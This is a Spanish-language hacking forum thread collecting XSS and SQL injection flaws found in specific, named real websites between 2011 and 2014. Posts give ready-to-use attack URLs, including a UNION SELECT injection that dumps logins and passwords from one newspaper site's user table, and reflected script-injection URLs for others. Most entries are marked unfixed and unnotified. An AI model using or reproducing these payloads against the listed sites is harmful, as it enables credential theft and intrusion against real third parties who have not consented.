Recopilatorio de Vulnerabilidades de XSS/SQLinjection

Iniciado por sirdarckcat, 26 Mayo 2008, 03:50 AM

0 Miembros y 2 Visitantes están viendo este tema.

franco_tuv

Sitio web: http://www.elpais.cr
Descubridor: franco_tuv
Fecha de descubrimiento: 22 de Julio del 2011
Fecha de notificación: 22 de Julio del 2011
Fecha de publicación: 23 de Julio del 2011
Arreglado : No
Información adicional:
SQLI
http://www.elpais.cr/galerias.php?id=-1+union+select+1,group_concat%28login,0x3a,password%29+from+406060_elpais.usuarios--

daryo

Sitio web: http://rebelion.org
Descubridor: daryo
Fecha de descubrimiento: 12 mayo 2012
Fecha de notificación: xxxxx
Fecha de publicación: xxxx
Arreglado : No
Información adicional:
Citar
XSS
http://rebelion.org/mostrar.php?id=%3Cscript%3Ealert%28/a/%29%3C/script%3E&submit=Buscar&inicio=1&tipo=3

PD:reviviendo el post XD
buenas

daryo

Sitio web: http://www.szkolamarzen.pl
Descubridor: daryo
Fecha de descubrimiento: 20 mayo 2012
Fecha de notificación: xxxxx
Fecha de publicación: xxxx
Arreglado : No
Información adicional:

sqli
http://www.szkolamarzen.pl/gim/newsone.php?id=
buenas

daryo

Sitio web: http://www.worstpreviews.com
Descubridor: daryo
Fecha de descubrimiento: la verdad ni recuerdo
Fecha de notificación: xxxxx
Fecha de publicación: xxxx
Arreglado : No
Información adicional:

sqli
http://www.worstpreviews.com/review.php?id=600
buenas

daryo

#44

Insertar Cita
Sitio web: http://www.eventdirect.ca
Descubridor: seguro alguien antes que yo :P
Fecha de descubrimiento: la verdad ni recuerdo
Fecha de notificación: xxxxx
Fecha de publicación: xxxx
Arreglado : No
Información adicional:
Código:

sqli
http://www.eventdirect.ca/game.php?ID=62
buenas

cachacko



Hazama

#47
Sitio web:http://www.espanol.manutd.com/
Descubridor:The BlacK DiamOnD
URL del aviso: --
Fecha de descubrimiento: 2013
Fecha de notificación:24/11/13
Fecha de publicación: --
Arreglado: Si
Vulnerabilidad: XSS
Información adicional:Aunque Esta vulnerabilidad haya sido supuesta mente arreglada,aun sigue existiendo solo que incluyendo código HTML en vez de javascript.

Código (javascript) [Seleccionar]
<script>alert("XSS");</script> &
Código (html4strict) [Seleccionar]
<h1>xss</h1>

Hazama

#48
Sitio web:http://blog.com.es/
Descubridor:The Black DiamOnD
URL del aviso:http://bugs.blog.co.uk/2014/05/04/html-xss-bug-18373598/
Fecha de descubrimiento: 04/05/2014
Fecha de notificación:04/05/2014
Fecha de publicación:04/05/2014
Arreglado: --
Vulnerabilidad: XSS reflejado
Informacion adicional:Blog Personal

http://support.blog.co.uk/search/%253Ch1%253EHOLA%2BMUNDO%253C%252Fh1%253E/AND/

Ceh

[youtube=640,360]C2VmExPbU5A[/youtube]

PETROLERA MAS POPULAR EN PERU

BY Security : Peruano y Muy PICHULON  ;D